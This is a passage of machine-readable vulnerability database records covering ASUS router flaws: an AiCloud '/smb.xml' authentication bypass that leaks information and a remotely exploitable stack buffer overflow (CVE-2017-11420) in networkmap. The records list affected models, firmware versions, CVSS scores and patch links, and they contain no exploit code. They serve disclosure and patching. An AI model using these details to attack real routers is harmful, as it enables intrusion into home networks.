"id": "JVNDB-2017-007274" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-443" } ], "trust": 0.6 } }
var-201403-0712
Vulnerability from variot
ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. An attacker could leverage this issue to bypass the authentication mechanism and obtain sensitive information. The following products running firmware version 3.0.0.4.374.x are vulnerable: RT-AC68U Dual-band Wireless-AC1900 Gigabit Router RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router RT-N66R Dual-Band Wireless-N900 Gigabit Router RT-N66U Dual-Band Wireless-N900 Gigabit Router RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router RT-N56R Dual-Band Wireless-AC1200 Gigabit Router RT-N56U Dual-Band Wireless-AC1200 Gigabit Router RT-N14U Wireless-N300 Cloud Router RT-N14UHP Wireless-N300 Cloud Router RT-N16 Wireless-N300 Gigabit Router RT-N16R Wireless-N300 Gigabit Router
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0712", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac56u router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n14u router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16 router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n56r router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66r router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66r router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68u router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n14uhp router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16r router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n56u wireless router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u router", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n66r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n56u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n56r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n16r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n16", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n14uhp", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n14u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac66r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac56u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" }, { "db": "BID", "id": "65861" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "kyle Lovett", "sources": [ { "db": "BID", "id": "65861" } ], "trust": 0.3 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-01390", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "CNVD", "id": "CNVD-2014-01390", "trust": 0.6, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS (ASUS) is the largest hardware manufacturer in Taiwan. A variety of ASUS router products (firmware version 3.0.0.4.374.x) failed to properly restrict access to the file /smb.xml after enabling the AiCloud web service, and an attacker could exploit the vulnerability to leak sensitive information. Multiple ASUS Routers are prone to an authentication-bypass vulnerability. \nAn attacker could leverage this issue to bypass the authentication mechanism and obtain sensitive information. \nThe following products running firmware version 3.0.0.4.374.x are vulnerable:\nRT-AC68U Dual-band Wireless-AC1900 Gigabit Router\nRT-AC66R Dual-Band Wireless-AC1750 Gigabit Router\nRT-AC66U Dual-Band Wireless-AC1750 Gigabit Router\nRT-N66R Dual-Band Wireless-N900 Gigabit Router\nRT-N66U Dual-Band Wireless-N900 Gigabit Router\nRT-AC56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56R Dual-Band Wireless-AC1200 Gigabit Router\nRT-N56U Dual-Band Wireless-AC1200 Gigabit Router\nRT-N14U Wireless-N300 Cloud Router\nRT-N14UHP Wireless-N300 Cloud Router\nRT-N16 Wireless-N300 Gigabit Router\nRT-N16R Wireless-N300 Gigabit Router", "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" }, { "db": "BID", "id": "65861" } ], "trust": 0.81 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "BID", "id": "65861", "trust": 0.9 }, { "db": "SECUNIA", "id": "56905", "trust": 0.6 }, { "db": "CNVD", "id": "CNVD-2014-01390", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" }, { "db": "BID", "id": "65861" } ] }, "id": "VAR-201403-0712", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" } ], "trust": 1.411373705909091 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" } ] }, "last_update_date": "2022-05-17T01:51:10.409000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Patch for multiple ASUS routers \u0027smb.xml\u0027 authentication bypass vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/43991" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.6, "url": "http://secunia.com/advisories/56905/" }, { "trust": 0.3, "url": "http://archives.neohapsis.com/archives/bugtraq/2014-02/0032.html" }, { "trust": 0.3, "url": "http://www.asus.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" }, { "db": "BID", "id": "65861" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2014-01390" }, { "db": "BID", "id": "65861" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-03-03T00:00:00", "db": "CNVD", "id": "CNVD-2014-01390" }, { "date": "2014-02-08T00:00:00", "db": "BID", "id": "65861" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-03-03T00:00:00", "db": "CNVD", "id": "CNVD-2014-01390" }, { "date": "2014-02-08T00:00:00", "db": "BID", "id": "65861" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "65861" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple ASUS Router \u0027smb.xml\u0027 Authentication Bypass Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2014-01390" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "65861" } ], "trust": 0.3 } }
var-201707-0535
Vulnerability from variot
Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0535", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac88u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac52u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.4180" }, { "model": "rt-ac66u b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt ac1900p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac51u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac1200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-n12hp", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-n12hp b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt-ac3100", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt n12\\+ pro", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac55u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac58u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7485" }, { "model": "rt-n16", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac53", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt-ac68u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n18u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac5300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3167" }, { "model": "rt ac1200gu", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.5577" }, { "model": "rt-n56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.378.7177" }, { "model": "rt-ac68p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac3200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n12d1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200g", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt ac1200g", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3167" }, { "model": "rt-n12d1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12hp", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-ac53", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt n12\\+ pro", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac1200", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-n16", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-24400" }, { "db": "JVNDB", "id": "JVNDB-2017-005985" }, { "db": "CNNVD", "id": "CNNVD-201707-754" }, { "db": "NVD", "id": "CVE-2017-11420" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005985" } ] }, "cve": "CVE-2017-11420", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2017-11420", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2017-24400", "impactScore": 10.0, "integrityImpact": "COMPLETE", 